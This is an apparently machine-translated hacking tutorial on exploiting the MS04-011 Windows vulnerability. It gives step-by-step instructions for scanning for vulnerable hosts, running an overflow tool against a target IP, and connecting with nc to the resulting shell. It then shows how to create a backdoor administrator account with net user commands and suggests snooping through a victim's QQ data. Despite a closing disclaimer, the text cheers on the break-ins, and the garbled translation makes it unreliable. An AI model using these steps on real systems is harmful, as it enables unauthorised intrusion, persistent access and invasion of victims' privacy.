Oh, everyone should know this vulnerability, haha, it is so good. Hacker uses it to get the operating system's Administrators permission to get the shell of the system. Not much to say anything else, see how they are all invaded by others.
1. First, go to download the MS04011 vulnerability to overflow, there are more online.
Tools include DSSCAN, Getos, MS04011 overflow tool
DSSCAN: This tool is a tool for scanning if there is a MS04011 vulnerability. When you scan the target machine, it will list its IP address, host name, NetBIOS name, and the most important thing is status information. It can Scanned to all survive hosts in this IP, if there is a machine of the MS04011 vulnerability, list Vulnerable in status information, otherwise not vulnerable. Generally scan 64 IP addresses at a time.
Getos: It is used to get the type of operating system, but must be open to the 139 port of the machine.
MS04011: It is the tool used to overflow.
2. How to overflow
First use DSSCAN, enter IP in the IP, then click on the right key, so that it enters the right box, you can choose
Then click the start. For example, we sweep to a machine result for this
IP hostname netbios status
192.168.1.33 you you Vulnerable
192.168.1.34 Haha Haha Not Vulnerable
Everyone can see the machine status of 192.168.1.33 for Vulnerable, which means that it exists the vulnerability of this MS04011.
Let us overflow it below, first get the type of machine to the other machine before starting overflow. Getos get
Enter CMD, enter, then go to your program path, enter Getos 192.168.1.33
The result will appear
[*] Connecting Port 139 ... ..
[*] Sending session request ... ..
[*] Sending Negotiation Request ....
Sending Setup Account Request ....
[*] Successful ...
REMOTE OS:
-------------
Workgroup This is the name of the working group
Windows 2000 Lan Manger
Windows 5.0 This is the type of operating system, if Windows 5.1 is XP
Ok, we know that its type is 2000, then we will use MS04011 to overflow.
First open two CMD windows, simultaneously enter MS04011 0 192.168.1.33 in two inside, then one one carries
In one cmd
Shellcode Size 404
RET VALUE = 1726 // Note 1726 is the code that overflows success
For XP systems, MS04011 1 192.168.1.33
3. How to get the shell of the machine
To use the most powerful Swiss army knife (name is NC), haha, this tool is not usually, go online.
Then enter NC 192.168.1.33 1234 in CMD. 1234 is a spilled port number. Haha does not appear such a prompt
C: / Winnt / System32>
// Haha, you have succeeded. You can do it.
For example: Net user haha 123 / add // can establish a user net localgroup administrators haha / add // of the 123-like machine, which enables Haha to include the Administrators group. Of course, you can go to the application's tencent directory. MM's QQ number, I will contact it later.
Serious statement: Do not use this method to do illegal behavior, if you don't have any responsibility. Publish this paper is to enable you to pay attention to self-system security, often patch. There are a lot of machines in the country where there is such a loophole, hehe! ! ! ! !